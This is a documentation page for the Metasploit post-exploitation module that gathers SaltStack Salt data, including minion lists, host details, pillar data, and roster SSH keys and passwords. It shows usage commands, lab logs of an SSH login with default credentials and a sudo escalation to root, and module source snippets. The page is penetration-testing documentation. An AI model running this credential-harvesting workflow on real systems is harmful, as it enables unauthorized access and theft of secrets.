SaltStack Salt Information Gatherer - Metasploit
This page contains detailed information about how to use the post/multi/gather/saltstack_salt metasploit module. For list of all metasploit modules, visit the Metasploit Module Library.
Module Overview
Name: SaltStack Salt Information Gatherer
Module: post/multi/gather/saltstack_salt
Source code: modules/post/multi/gather/saltstack_salt.rb
Disclosure date: -
Last modification time: 2021-05-15 09:38:15 +0000
Supported architecture(s): -
Supported platform(s): -
Target service / protocol: -
Target network port(s): -
List of CVEs: -
This module gathers information from SaltStack Salt masters and minions. Data gathered from minions: 1. salt minion config file Data gathered from masters: 1. minion list (denied, pre, rejected, accepted) 2. minion hostname/ip/os (depending on module settings) 3. SLS 4. roster, any SSH keys are retrieved and saved to creds, SSH passwords printed 5. minion config files 6. pillar data
Module Ranking and Traits
Module Ranking:
- normal: The exploit is otherwise reliable, but depends on a specific version and can't (or doesn't) reliably autodetect. More information about ranking can be found here.
Basic Usage
There are two ways to execute this post module.
From the Meterpreter prompt
The first is by using the "run" command at the Meterpreter prompt. It allows you to run the post module against that specific session:
meterpreter > run post/multi/gather/saltstack_salt
From the msf prompt
The second is by using the "use" command at the msf prompt. You will have to figure out which session ID to set manually. To list all session IDs, you can use the "sessions" command.
msf > use post/multi/gather/saltstack_salt
msf post(saltstack_salt) > show options
... show and set options ...
msf post(saltstack_salt) > set SESSION session-id
msf post(saltstack_salt) > exploit
If you wish to run the post against all sessions from framework, here is how:
1 - Create the following resource script:
framework.sessions.each_pair do |sid, session|
run_single("use post/multi/gather/saltstack_salt")
run_single("set SESSION #{sid}")
run_single("run")
end
2 - At the msf prompt, execute the above resource script:
msf > resource path-to-resource-script
Required Options
- SESSION: The session to run this module on.
Knowledge Base
Vulnerable Application
This module gathers data from salt stack minions and masters.
Data gathered from minions:
- salt minion config file
Data gathered from masters:
- minion list (denied, pre, rejected, accepted)
- minion hostname/ip/os (depending on module settings)
- SLS
- roster, any SSH keys are retrieved and saved to creds, SSH passwords printed
- minion config files
- pillar data
Verification Steps
- Install salt and configure it
- Start msfconsole
- Get a session with permissions required (root typically)
- Do:
use post/multi/gather/saltstack_salt
- Do:
set session #
- Do:
run
- You should get all the salt stack info
Options
GETHOSTNAME
Gather hostname from the minions. Defaults to true
GETIP
Gather IP from the minions. Defaults to true
GETOS
Gather OS from the minions. Defaults to true
MINIONS
Which minions to gather info from. Defaults to *
(all)
TIMEOUT
Timeout value for running the salt
commands. Bigger salt networks will need a bigger value. Defaults to 120
Scenarios
Minion 3002.2 on Ubuntu 20.04
Setup
[*] Processing salt.rb for ERB directives.
resource (salt.rb)> use auxiliary/scanner/ssh/ssh_login
resource (salt.rb)> set username salt
username => salt
resource (salt.rb)> set password salt
password => salt
resource (salt.rb)> set rhosts 333.333.3.333
rhosts => 333.333.3.333
resource (salt.rb)> run
[+] 333.333.3.333:22 - Success: 'salt:salt' 'uid=1000(salt) gid=1000(salt) groups=1000(salt),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),116(lxd) Linux salt-minion 5.4.0-58-generic #64-Ubuntu SMP Wed Dec 9 08:16:25 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux '
[*] Command shell session 1 opened (1.1.1.1:34863 -> 333.333.3.333:22) at 2021-04-10 12:50:12 -0400
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
resource (salt.rb)> use post/multi/manage/sudo
resource (salt.rb)> set session 1
session => 1
resource (salt.rb)> set password salt
password => salt
resource (salt.rb)> run
[*] SUDO: Attempting to upgrade to UID 0 via sudo
[*] Sudoing with password `salt'.
[+] SUDO: Root shell secured.
[*] Post module execution completed
Module Run
resource (salt.rb)> use post/multi/gather/saltstack_salt
resource (salt.rb)> set session 1
session => 1
resource (salt.rb)> set verbose true
verbose => true
resource (salt.rb)> run
[!] SESSION may not be compatible with this module.
[*] Looking for salt minion config files
[+] Minion master: 444.444.4.444
[+] 333.333.3.333:22 - minion file successfully retrieved and saved on /root/.msf4/loot/20210410125036_default_333.333.3.333_saltstack_salt_minion_561296.bin
[*] Post module execution completed
msf6 post(multi/gather/saltstack_salt) > cat /root/.msf4/loot/20210410125036_default_333.333.3.333_saltstack_salt_minion_561296.bin
[*] exec: cat /root/.msf4/loot/20210410125036_default_333.333.3.333_saltstack_salt_minion_561296.bin
---
master: 444.444.4.444
Minion 3003 on Windows Server 2012
msf6 post(multi/gather/saltstack_salt) > rexploit
[*] Reloading module...
[!] SESSION may not be compatible with this module.
[*] Looking for salt minion config files
[+] Minion master: 1.1.1.1
[+] 2.2.2.2:49299 - minion file successfully retrieved and saved to /home/h00die/.msf4/loot/20210502093836_default_2.2.2.2_saltstack_minion_337783.bin
[*] Looking for salt minion config files
[+] Minion master: 1.1.1.1
[+] 2.2.2.2:49299 - minion file successfully retrieved and saved to /home/h00die/.msf4/loot/20210502093837_default_2.2.2.2_saltstack_minion_063036.bin
[*] Post module execution completed
Master 3002.2 on Ubuntu 20.04
Setup
[*] Processing salt.rb for ERB directives.
resource (salt.rb)> use auxiliary/scanner/ssh/ssh_login
resource (salt.rb)> set username salt
username => salt
resource (salt.rb)> set password salt
password => salt
resource (salt.rb)> set rhosts 444.444.4.444
rhosts => 444.444.4.444
resource (salt.rb)> run
[+] 444.444.4.444:22 - Success: 'salt:salt' 'uid=1000(salt) gid=1000(salt) groups=1000(salt),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),116(lxd) Linux salt-master 5.4.0-58-generic #64-Ubuntu SMP Wed Dec 9 08:16:25 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux '
[*] Command shell session 1 opened (1.1.1.1:35097 -> 444.444.4.444:22) at 2021-04-10 12:11:29 -0400
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
resource (salt.rb)> use post/multi/manage/sudo
resource (salt.rb)> set session 1
session => 1
resource (salt.rb)> set password salt
password => salt
resource (salt.rb)> run
[*] SUDO: Attempting to upgrade to UID 0 via sudo
[*] Sudoing with password `salt'.
[+] SUDO: Root shell secured.
[*] Post module execution completed
Module Run
resource (salt.rb)> use post/multi/gather/saltstack_salt
resource (salt.rb)> set session 1
session => 1
resource (salt.rb)> set verbose true
verbose => true
resource (salt.rb)> run
[!] SESSION may not be compatible with this module.
[*] Attempting to list minions
[*] minions:
- mac_minion
- salt-minion
- window-salt-minion
minions_denied: []
minions_pre: []
minions_rejected: []
[+] 333.333.3.333:22 - minion file successfully retrieved and saved to /.msf4/loot/20210502081041_default_333.333.3.333_saltstack_minion_980449.bin
[+] Minions List
============
Status Minion Name
------ -----------
Accepted mac_minion
Accepted salt-minion
Accepted window-salt-minion
[*] Gathering data from minions (this can take some time)
[*] salt-minion:
network.get_hostname: salt-minion
network.interfaces:
ens160:
hwaddr: 00:0c:29:00:00:00
inet:
- address: 444.444.4.444
broadcast: 192.168.2.255
label: ens160
netmask: 255.255.255.0
inet6:
- address: fe80::20c:29ff:fe87:95b
prefixlen: '64'
scope: link
up: true
lo:
hwaddr: 00:00:00:00:00:00
inet:
- address: 127.0.0.1
broadcast: null
label: lo
netmask: 255.0.0.0
inet6:
- address: ::1
prefixlen: '128'
scope: host
up: true
status.version: 'Linux version 5.4.0-72-generic (buildd@lcy01-amd64-019) (gcc version
9.3.0 (Ubuntu 9.3.0-17ubuntu1~20.04)) #80-Ubuntu SMP Mon Apr 12 17:35:00 UTC 2021'
system.get_system_info: "Traceback (most recent call last):\n File \"/usr/lib/python3/dist-packages/salt/minion.py\",
line 2083, in _thread_multi_return\n return_data = minion_instance._execute_job_function(\n
\ File \"/usr/lib/python3/dist-packages/salt/minion.py\", line 1846, in _execute_job_function\n
\ return_data = self.executors[fname](opts, data, func, args, kwargs)\n File
\"/usr/lib/python3/dist-packages/salt/executors/direct_call.py\", line 12, in
execute\n return func(*args, **kwargs)\nTypeError: 'str' object is not callable\n"
mac_minion:
network.get_hostname: h00dies-MBP.domain
network.interfaces:
awdl0:
hwaddr: ca:6a:47:00:00:00
inet6:
- address: fe80::c86a:47ff:fe4a:39d2
prefixlen: '64'
scope: '0x9'
up: true
bridge0:
hwaddr: 82:0f:16:00:00:00
up: true
en0:
hwaddr: 80:e6:50:00:00:00
inet:
- address: 222.222.2.22
broadcast: 192.168.2.255
netmask: 255.255.255.0
inet6:
- address: fe80::ef:6155:1f8b:98df
prefixlen: '64'
scope: null
up: true
en1:
hwaddr: 82:0f:16:00:00:00
up: true
en2:
hwaddr: 82:0f:16:00:00:00
up: true
gif0:
up: false
llw0:
hwaddr: ca:6a:47:00:00:00
inet6:
- address: fe80::c86a:47ff:fe4a:39d2
prefixlen: '64'
scope: '0xa'
up: true
lo0:
inet:
- address: 127.0.0.1
netmask: 255.0.0.0
inet6:
- address: ::1
prefixlen: '128'
scope: null
- address: fe80::1
prefixlen: '64'
scope: '0x1'
up: true
p2p0:
hwaddr: 02:e6:50:00:00:00
up: true
stf0:
up: false
status.version: This method is unsupported on the current operating system!
system.get_system_info: "Traceback (most recent call last):\n File \"/opt/salt/lib/python3.7/site-packages/salt-3003-py3.7.egg/salt/minion.py\",
line 2099, in _thread_multi_return\n function_name, function_args, executors,
opts, data\n File \"/opt/salt/lib/python3.7/site-packages/salt-3003-py3.7.egg/salt/minion.py\",
line 1861, in _execute_job_function\n return_data = self.executors[fname](opts,
data, func, args, kwargs)\n File \"/opt/salt/lib/python3.7/site-packages/salt-3003-py3.7.egg/salt/loader.py\",
line 1235, in __call__\n return self.loader.run(run_func, *args, **kwargs)\n
\ File \"/opt/salt/lib/python3.7/site-packages/salt-3003-py3.7.egg/salt/loader.py\",
line 2268, in run\n return self._last_context.run(self._run_as, _func_or_method,
*args, **kwargs)\n File \"/opt/salt/lib/python3.7/site-packages/salt-3003-py3.7.egg/salt/loader.py\",
line 2283, in _run_as\n return _func_or_method(*args, **kwargs)\n File \"/opt/salt/lib/python3.7/site-packages/salt-3003-py3.7.egg/salt/executors/direct_call.py\",
line 12, in execute\n return func(*args, **kwargs)\nTypeError: 'str' object
is not callable\n"
window-salt-minion:
network.get_hostname: WIN-EDKFSE5QPAB
network.interfaces:
Intel(R) 82574L Gigabit Network Connection:
hwaddr: 00:0C:29:00:00:00
inet:
- address: 555.555.5.555
broadcast: 192.168.2.255
gateway: 0.0.0.0
label: Intel(R) 82574L Gigabit Network Connection
netmask: 255.255.255.0
inet6:
- address: fe80::48f2:f6fd:3dc2:a4eb
gateway: ''
up: true
Software Loopback Interface 1:
hwaddr: ':::::'
inet:
- address: 127.0.0.1
broadcast: 127.255.255.255
gateway: ''
label: Software Loopback Interface 1
netmask: 255.0.0.0
inet6:
- address: ::1
gateway: ''
up: true
status.version: "Traceback (most recent call last):\n File \"c:\\salt\\bin\\lib\\site-packages\\salt-3003-py3.7.egg\\salt\\minion.py\",
line 2099, in _thread_multi_return\n function_name, function_args, executors,
opts, data\n File \"c:\\salt\\bin\\lib\\site-packages\\salt-3003-py3.7.egg\\salt\\minion.py\",
line 1861, in _execute_job_function\n return_data = self.executors[fname](opts,
data, func, args, kwargs)\n File \"c:\\salt\\bin\\lib\\site-packages\\salt-3003-py3.7.egg\\salt\\loader.py\",
line 1235, in __call__\n return self.loader.run(run_func, *args, **kwargs)\n
\ File \"c:\\salt\\bin\\lib\\site-packages\\salt-3003-py3.7.egg\\salt\\loader.py\",
line 2268, in run\n return self._last_context.run(self._run_as, _func_or_method,
*args, **kwargs)\n File \"c:\\salt\\bin\\lib\\site-packages\\salt-3003-py3.7.egg\\salt\\loader.py\",
line 2283, in _run_as\n return _func_or_method(*args, **kwargs)\n File \"c:\\salt\\bin\\lib\\site-packages\\salt-3003-py3.7.egg\\salt\\executors\\direct_call.py\",
line 12, in execute\n return func(*args, **kwargs)\nTypeError: 'str' object
is not callable\n"
system.get_system_info:
bios_caption: 'PhoenixBIOS 4.0 Release 6.0 '
bios_description: 'PhoenixBIOS 4.0 Release 6.0 '
bios_details:
- INTEL - 6040000
- 'PhoenixBIOS 4.0 Release 6.0 '
bios_manufacturer: Phoenix Technologies LTD
bios_version: INTEL - 6040000
bootup_state: Normal boot
caption: WIN-EDKFSE5QPAB
chassis_bootup_state: Safe
chassis_sku_number: null
description: ''
dns_hostname: WIN-EDKFSE5QPAB
domain: WORKGROUP
domain_role: Standalone Server
hardware_manufacturer: VMware, Inc.
hardware_model: VMware Virtual Platform
hardware_serial: VMware-56 4d 85 da 18 47 2c 63-c7 71 42 6b ab 7a c9 f1
install_date: '2019-06-18 18:28:30'
last_boot: '2021-04-30 14:21:48'
name: WIN-EDKFSE5QPAB
network_server_mode_enabled: true
organization: ''
os_architecture: 64-bit
os_manufacturer: Microsoft Corporation
os_name: Microsoft Windows Server 2012 Standard
os_type: Server
os_version: 6.2.9200
part_of_domain: false
pc_system_type: Desktop
power_state: 0
primary: true
processor_cores: 2
processor_manufacturer: GenuineIntel
processor_max_clock_speed: 2600MHz
processors: 2
processors_logical: 2
registered_user: Windows User
status: OK
system_directory: C:\Windows\system32
system_drive: 'C:'
system_type: x64-based PC
thermal_state: Safe
total_physical_memory: 4.000GB
total_physical_memory_raw: '4294430720'
users: 1
windows_directory: C:\Windows
workgroup: WORKGROUP
[+] 333.333.3.333:22 - minion data gathering successfully retrieved and saved to /.msf4/loot/20210502081051_default_333.333.3.333_saltstack_minion_337797.bin
[+] Found minion: salt-minion (444.444.4.444) - Linux version 5.4.0-72-generic (buildd@lcy01-amd64-019) (gcc version 9.3.0 (Ubuntu 9.3.0-17ubuntu1~20.04)) #80-Ubuntu SMP Mon Apr 12 17:35:00 UTC 2021
[+] Found minion: h00dies-MBP.domain (222.222.2.22) -
[+] Found minion: WIN-EDKFSE5QPAB (555.555.5.555) - 6.2.9200
[*] Showing SLS
[+] 333.333.3.333:22 - SLS output successfully retrieved and saved to /.msf4/loot/20210502081057_default_333.333.3.333_saltstack_sls_969146.txt
[*] Loading roster
[+] Found SSH minion: web1 (192.168.42.1)
[+] Found SSH minion: web2 (192.168.42.2)
[+] SSH key /tmp/id_rsa password hello
[-] Unable to find salt-ssh priv key /tmp/id_rsa
[+] Found SSH minion: web3 (192.168.42.3)
[-] Unable to find salt-ssh priv key /tmp/id_rsa2
[*] Looking for salt minion config files
[+] 333.333.3.333:22 - roster file successfully retrieved and saved to /.msf4/loot/20210502081101_default_333.333.3.333_saltstack_roster_292921.bin
[*] Gathering pillar data
[*] salt-minion:
info: some data
mac_minion:
info: some data
window-salt-minion:
info: some data
[+] 333.333.3.333:22 - pillar data gathering successfully retrieved and saved to /.msf4/loot/20210502081106_default_333.333.3.333_saltstack_pillar_899591.bin
[*] Post module execution completed
msf6 post(multi/gather/saltstack_salt) > hosts
Hosts
=====
address mac name os_name os_flavor os_sp purpose info comments
------- --- ---- ------- --------- ----- ------- ---- --------
222.222.2.22 80:e6:50:00:00:00 h00dies-MBP.domain osx SaltStack minion to 333.333.3.333
333.333.3.333 linux
444.444.4.444 00:0c:29:00:00:00 salt-minion Linux version 5.4.0-72-generic (buildd@lcy01-amd64-01 SaltStack minion to 333.333.3.333
555.555.5.555 00:0C:29:00:00:00 WIN-EDKFSE5QPAB Microsoft Windows Server 2012 Standard 6.2.9200 Server SaltStack minion to 333.333.3.333
192.168.42.1 web1 SaltStack ssh minion to 333.333.3.333
192.168.42.2 web2 Unknown device SaltStack ssh minion to 333.333.3.333
192.168.42.3 web3 SaltStack ssh minion to 333.333.3.333
Go back to menu.
Msfconsole Usage
Here is how the multi/gather/saltstack_salt post exploitation module looks in the msfconsole:
msf6 > use post/multi/gather/saltstack_salt
msf6 post(multi/gather/saltstack_salt) > show info
Name: SaltStack Salt Information Gatherer
Module: post/multi/gather/saltstack_salt
Platform:
Arch:
Rank: Normal
Provided by:
h00die
c2Vlcgo
Compatible session types:
Meterpreter
Shell
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
GETHOSTNAME true no Gather Hostname from minions
GETIP true no Gather IP from minions
GETOS true no Gather OS from minions
MINIONS * yes Minions Target
SESSION yes The session to run this module on.
TIMEOUT 120 yes Timeout for salt commands to run
Description:
This module gathers information from SaltStack Salt masters and
minions. Data gathered from minions: 1. salt minion config file Data
gathered from masters: 1. minion list (denied, pre, rejected,
accepted) 2. minion hostname/ip/os (depending on module settings) 3.
SLS 4. roster, any SSH keys are retrieved and saved to creds, SSH
passwords printed 5. minion config files 6. pillar data
Module Options
This is a complete list of options available in the multi/gather/saltstack_salt post exploitation module:
msf6 post(multi/gather/saltstack_salt) > show options
Module options (post/multi/gather/saltstack_salt):
Name Current Setting Required Description
---- --------------- -------- -----------
GETHOSTNAME true no Gather Hostname from minions
GETIP true no Gather IP from minions
GETOS true no Gather OS from minions
MINIONS * yes Minions Target
SESSION yes The session to run this module on.
TIMEOUT 120 yes Timeout for salt commands to run
Advanced Options
Here is a complete list of advanced options supported by the multi/gather/saltstack_salt post exploitation module:
msf6 post(multi/gather/saltstack_salt) > show advanced
Module advanced options (post/multi/gather/saltstack_salt):
Name Current Setting Required Description
---- --------------- -------- -----------
VERBOSE false no Enable detailed status messages
WORKSPACE no Specify the workspace for this module
Post Actions
This is a list of all post exploitation actions which the multi/gather/saltstack_salt module can do:
msf6 post(multi/gather/saltstack_salt) > show actions
Post actions:
Name Description
---- -----------
Evasion Options
Here is the full list of possible evasion options supported by the multi/gather/saltstack_salt post exploitation module in order to evade defenses (e.g. Antivirus, EDR, Firewall, NIDS etc.):
msf6 post(multi/gather/saltstack_salt) > show evasion
Module evasion options:
Name Current Setting Required Description
---- --------------- -------- -----------
Go back to menu.
Error Messages
This module may fail with the following error messages:
- Unable to process pillar command output
- No results returned. Try increasing the TIMEOUT or decreasing the minions being checked
- Unable to process gather command output
- salt-key not present on system
- Unable to load salt-key -L data
- salt not found on system
- Unable to load <CONFIG>
- Unable to find salt-ssh priv key <PRIV>
Check for the possible causes from the code snippets below found in the module source code. This can often times help in identifying the root cause of the problem.
Unable to process pillar command output
Here is a relevant code snippet related to the "Unable to process pillar command output" error message:
49: vprint_status(out)
50: results = YAML.safe_load(out, [Symbol]) # during testing we discovered at times Symbol needs to be loaded
51: store_path = store_loot('saltstack_pillar_data_gather', 'application/x-yaml', session, results.to_yaml, 'pillar_gather.yaml', 'SaltStack Salt Pillar Gather')
52: print_good("#{peer} - pillar data gathering successfully retrieved and saved to #{store_path}")
53: rescue Psych::SyntaxError
54: print_error('Unable to process pillar command output')
55: return
56: end
57: end
58:
59: def gather_minion_data
No results returned. Try increasing the TIMEOUT or decreasing the minions being checked
Here is a relevant code snippet related to the "No results returned. Try increasing the TIMEOUT or decreasing the minions being checked" error message:
73: commas = ',' * (command.length - 1) # we need to provide empty arguments for each command
74: command = "salt '#{datastore['MINIONS']}' --output=yaml #{command.join(',')} #{commas}"
75: begin
76: out = cmd_exec(command, nil, datastore['TIMEOUT'])
77: if out == '' || out.nil?
78: print_error('No results returned. Try increasing the TIMEOUT or decreasing the minions being checked')
79: return
80: end
81: vprint_status(out)
82: results = YAML.safe_load(out, [Symbol]) # during testing we discovered at times Symbol needs to be loaded
83: store_path = store_loot('saltstack_minion_data_gather', 'application/x-yaml', session, results.to_yaml, 'minion_data_gather.yaml', 'SaltStack Salt Minion Data Gather')
Unable to process gather command output
Here is a relevant code snippet related to the "Unable to process gather command output" error message:
81: vprint_status(out)
82: results = YAML.safe_load(out, [Symbol]) # during testing we discovered at times Symbol needs to be loaded
83: store_path = store_loot('saltstack_minion_data_gather', 'application/x-yaml', session, results.to_yaml, 'minion_data_gather.yaml', 'SaltStack Salt Minion Data Gather')
84: print_good("#{peer} - minion data gathering successfully retrieved and saved to #{store_path}")
85: rescue Psych::SyntaxError
86: print_error('Unable to process gather command output')
87: return
88: end
89: return if results == false || results.nil?
90: return if results.include?('Salt request timed out.') || results.include?('Minion did not return.')
91:
salt-key not present on system
Here is a relevant code snippet related to the "salt-key not present on system" error message:
135:
136: def list_minions
137: # pull minions from a master
138: print_status('Attempting to list minions')
139: unless command_exists?('salt-key')
140: print_error('salt-key not present on system')
141: return
142: end
143: begin
144: out = cmd_exec('salt-key', '-L --output=yaml', datastore['TIMEOUT'])
145: vprint_status(out)
Unable to load salt-key -L data
Here is a relevant code snippet related to the "Unable to load salt-key -L data" error message:
143: begin
144: out = cmd_exec('salt-key', '-L --output=yaml', datastore['TIMEOUT'])
145: vprint_status(out)
146: minions = YAML.safe_load(out)
147: rescue Psych::SyntaxError
148: print_error('Unable to load salt-key -L data')
149: return
150: end
151:
152: tbl = Rex::Text::Table.new(
153: 'Header' => 'Minions List',
salt not found on system
Here is a relevant code snippet related to the "salt not found on system" error message:
196: list_minions
197: gather_minion_data if datastore['GETOS'] || datastore['GETHOSTNAME'] || datastore['GETIP']
198:
199: # get sls files
200: unless command_exists?('salt')
201: print_error('salt not found on system')
202: return
203: end
204: print_status('Showing SLS')
205: output = cmd_exec('salt', "'#{datastore['MINIONS']}' state.show_sls '*'", datastore['TIMEOUT'])
206: store_path = store_loot('saltstack_sls', 'text/plain', session, output, 'sls.txt', 'SaltStack Salt Master SLS Output')
Unable to load <CONFIG>
Here is a relevant code snippet related to the "Unable to load <CONFIG>" error message:
214: next unless file?(config)
215:
216: begin
217: minions = YAML.safe_load(read_file(config))
218: rescue Psych::SyntaxError
219: print_error("Unable to load #{config}")
220: next
221: end
222: store_path = store_loot('saltstack_roster', 'application/x-yaml', session, minion.to_yaml, 'roster.yaml', 'SaltStack Salt Roster File')
223: print_good("#{peer} - roster file successfully retrieved and saved to #{store_path}")
224: next if minions.nil?
Unable to find salt-ssh priv key <PRIV>
Here is a relevant code snippet related to the "Unable to find salt-ssh priv key <PRIV>" error message:
275: create_credential_and_login(cred)
276: next
277: end
278:
279: unless file?(priv)
280: print_error(" Unable to find salt-ssh priv key #{priv}")
281: next
282: end
283: input = read_file(priv)
284: store_path = store_loot('ssh_key', 'plain/txt', session, input, 'salt-ssh.rsa', 'SaltStack Salt SSH Private Key')
285: print_good(" #{priv} stored to #{store_path}")
Go back to menu.
Related Pull Requests
Go back to menu.
See Also
Check also the following modules related to this module:
- post/multi/gather/apple_ios_backup
- post/multi/gather/aws_ec2_instance_metadata
- post/multi/gather/aws_keys
- post/multi/gather/check_malware
- post/multi/gather/chrome_cookies
- post/multi/gather/dbvis_enum
- post/multi/gather/dns_bruteforce
- post/multi/gather/dns_reverse_lookup
- post/multi/gather/dns_srv_lookup
- post/multi/gather/docker_creds
- post/multi/gather/enum_hexchat
- post/multi/gather/enum_software_versions
- post/multi/gather/enum_vbox
- post/multi/gather/env
- post/multi/gather/fetchmailrc_creds
- post/multi/gather/filezilla_client_cred
- post/multi/gather/find_vmx
- post/multi/gather/firefox_creds
- post/multi/gather/gpg_creds
- post/multi/gather/grub_creds
- post/multi/gather/irssi_creds
- post/multi/gather/jboss_gather
- post/multi/gather/jenkins_gather
- post/multi/gather/lastpass_creds
- post/multi/gather/maven_creds
- post/multi/gather/multi_command
- post/multi/gather/netrc_creds
- post/multi/gather/pgpass_creds
- post/multi/gather/pidgin_cred
- post/multi/gather/ping_sweep
- post/multi/gather/remmina_creds
- post/multi/gather/resolve_hosts
- post/multi/gather/rsyncd_creds
- post/multi/gather/rubygems_api_key
- post/multi/gather/run_console_rc_file
- post/multi/gather/skype_enum
- post/multi/gather/ssh_creds
- post/multi/gather/thunderbird_creds
- post/multi/gather/tomcat_gather
- post/multi/gather/ubiquiti_unifi_backup
- post/multi/gather/unix_cached_ad_hashes
- post/multi/gather/unix_kerberos_tickets
- post/multi/gather/wlan_geolocate
Authors
- h00die
- c2Vlcgo
Version
This page has been produced using Metasploit Framework version 6.1.24-dev. For more modules, visit the Metasploit Module Library.
Go back to menu.